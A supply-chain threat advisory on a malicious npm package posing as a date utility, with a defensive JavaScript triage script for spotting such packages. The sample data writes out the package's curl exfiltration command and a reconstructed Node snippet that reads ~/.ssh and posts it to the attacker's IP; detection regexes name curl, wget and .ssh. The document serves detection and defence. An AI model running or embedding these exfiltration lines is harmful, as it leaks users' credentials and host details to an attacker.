Supply-chain threat intelligence
Risk score: 92
Indexed incident for houzidawang806 (npm).
Package advertises itself as 'a simple date formatting utility' (index.js is a 7-line formatDate export), but ships postinstall.js, which enumerates the contents of the installer's ~/.ssh directory and POSTs the listing, along with username and platform, to https://124.221.154.135/post. The file's own comments explicitly describe the destination as a C2 server.

In addition, package.json scripts.build runs curl -X POST --data "h=$(hostname)&u=$(whoami)" http://124.221.154.135/pre, sending the installer's hostname and login name over plain HTTP to the same bare IP.

The description/contents mismatch (a date-utility cover story shipping SSH enumeration plus C2 beaconing) is the canonical supply-chain malware shape.

postinstall.js is not wired into a lifecycle hook in this version, and build is not a step npm runs on its own, so a plain npm install of this version does not execute either payload. The file is nevertheless named and structured to auto-execute the moment a postinstall hook pointing at it is added, and any consumer running npm run build triggers the curl exfiltration; note that npm install --ignore-scripts blocks lifecycle hooks but does nothing against an explicit npm run build. Intent is unambiguous; this is not a legitimate package.
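A static triage check for the pattern described above, as an added example (it is not code from the indexed package or from this intel feed). It assumes package.json and the package's source files have already been extracted from the tarball into plain strings; the index.js and postinstall.js texts below are constructed stand-ins that mirror the description, not the package's actual sources, and the severity rules (critical for a hook npm runs on its own during install, high for a script that needs an explicit npm run, medium for a dormant hook-named file) are this example's own.

```javascript
// Added example: static triage of an npm package for the shape described above.
// Inputs are constructed stand-ins, not the indexed package's real sources.

// Lifecycle scripts npm runs automatically during `npm install` (no `npm run` needed).
const AUTO_RUN_HOOKS = new Set(['preinstall', 'install', 'postinstall', 'prepare']);

// Bare IPv4 literals, with or without an http(s) scheme; group 1 is the IP.
const BARE_IP = /(?:https?:\/\/)?\b((?:\d{1,3}\.){3}\d{1,3})\b/g;
const NET_TOOL = /\b(?:curl|wget)\b/;
const SSH_DIR = /\.ssh\b/;
// Node primitives that can carry data off the host.
const HTTP_CALL = /\b(?:https?\.request|https?\.get|fetch|XMLHttpRequest|axios)\b/;

function bareIps(text) {
  return [...new Set([...text.matchAll(BARE_IP)].map((m) => m[1]))];
}

// Names of scripts entries whose command mentions the given file (e.g. "node postinstall.js").
function scriptsReferencing(scripts, fileName) {
  return Object.entries(scripts)
    .filter(([, cmd]) => cmd.includes(fileName))
    .map(([name]) => name);
}

function triagePackage(pkg, files) {
  const scripts = pkg.scripts || {};
  const findings = [];

  // 1. Scripts entries that reach out with curl/wget or to a bare IP.
  for (const [name, cmd] of Object.entries(scripts)) {
    const ips = bareIps(cmd);
    if (NET_TOOL.test(cmd) || ips.length) {
      const auto = AUTO_RUN_HOOKS.has(name);
      findings.push({
        severity: auto ? 'critical' : 'high',
        where: `scripts.${name}`,
        reason: auto
          ? 'network call in a hook npm runs automatically on install'
          : `network call runs on \`npm run ${name}\``,
        indicators: ips,
      });
    }
  }

  // 2. Source files that touch ~/.ssh and also have a way to send data out.
  for (const [path, src] of Object.entries(files)) {
    const fileName = path.split('/').pop();
    const ips = bareIps(src);
    if (SSH_DIR.test(src) && (HTTP_CALL.test(src) || ips.length)) {
      const wiredTo = scriptsReferencing(scripts, fileName);
      const autoRun = wiredTo.some((n) => AUTO_RUN_HOOKS.has(n));
      findings.push({
        severity: autoRun ? 'critical' : 'high',
        where: path,
        reason: 'reads .ssh and contains an outbound HTTP call'
          + (wiredTo.length ? ` (wired to ${wiredTo.join(', ')})` : ' (not wired to any script)'),
        indicators: ips,
      });
    }
    // 3. Dormant hook: a file named like a lifecycle hook that no script references yet.
    const stem = fileName.replace(/\.[cm]?js$/, '');
    if (AUTO_RUN_HOOKS.has(stem) && scriptsReferencing(scripts, fileName).length === 0) {
      findings.push({
        severity: 'medium',
        where: path,
        reason: `named like the ${stem} hook but not wired; runs as soon as a hook is added`,
        indicators: [],
      });
    }
  }
  return findings;
}

// Collapse findings into a verdict plus the network indicators to block.
function summarize(findings) {
  const indicators = [...new Set(findings.flatMap((f) => f.indicators))];
  const worst = ['critical', 'high', 'medium'].find((s) => findings.some((f) => f.severity === s)) || 'none';
  return { verdict: worst === 'none' ? 'clean' : 'malicious', worst, indicators };
}

// Constructed sample mirroring the description (stand-in, not the real package contents).
const SAMPLE_PKG = {
  name: 'houzidawang806',
  description: 'a simple date formatting utility',
  main: 'index.js',
  scripts: {
    build: 'curl -X POST --data "h=$(hostname)&u=$(whoami)" http://124.221.154.135/pre',
  },
};
const SAMPLE_FILES = {
  'index.js': 'module.exports.formatDate = (d) => d.toISOString().slice(0, 10);\n',
  'postinstall.js': [
    "const fs = require('fs'), os = require('os'), https = require('https');",
    "const listing = fs.readdirSync(os.homedir() + '/.ssh');",
    "const body = JSON.stringify({ u: os.userInfo().username, p: process.platform, listing });",
    "https.request({ host: '124.221.154.135', path: '/post', method: 'POST' }).end(body);",
  ].join('\n'),
};

const SAMPLE_FINDINGS = triagePackage(SAMPLE_PKG, SAMPLE_FILES);
console.log(JSON.stringify({ findings: SAMPLE_FINDINGS, summary: summarize(SAMPLE_FINDINGS) }, null, 2));
```

On the constructed sample this yields three findings: scripts.build (high, reachable only via npm run build), postinstall.js (high, reads .ssh and posts out, not wired), and the dormant-hook note on the same file (medium). If a later version were to add "postinstall": "node postinstall.js", the same file would score critical and the dormant note would disappear, which is the escalation the advisory text warns about.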
Affected versions
Indicators
Timeline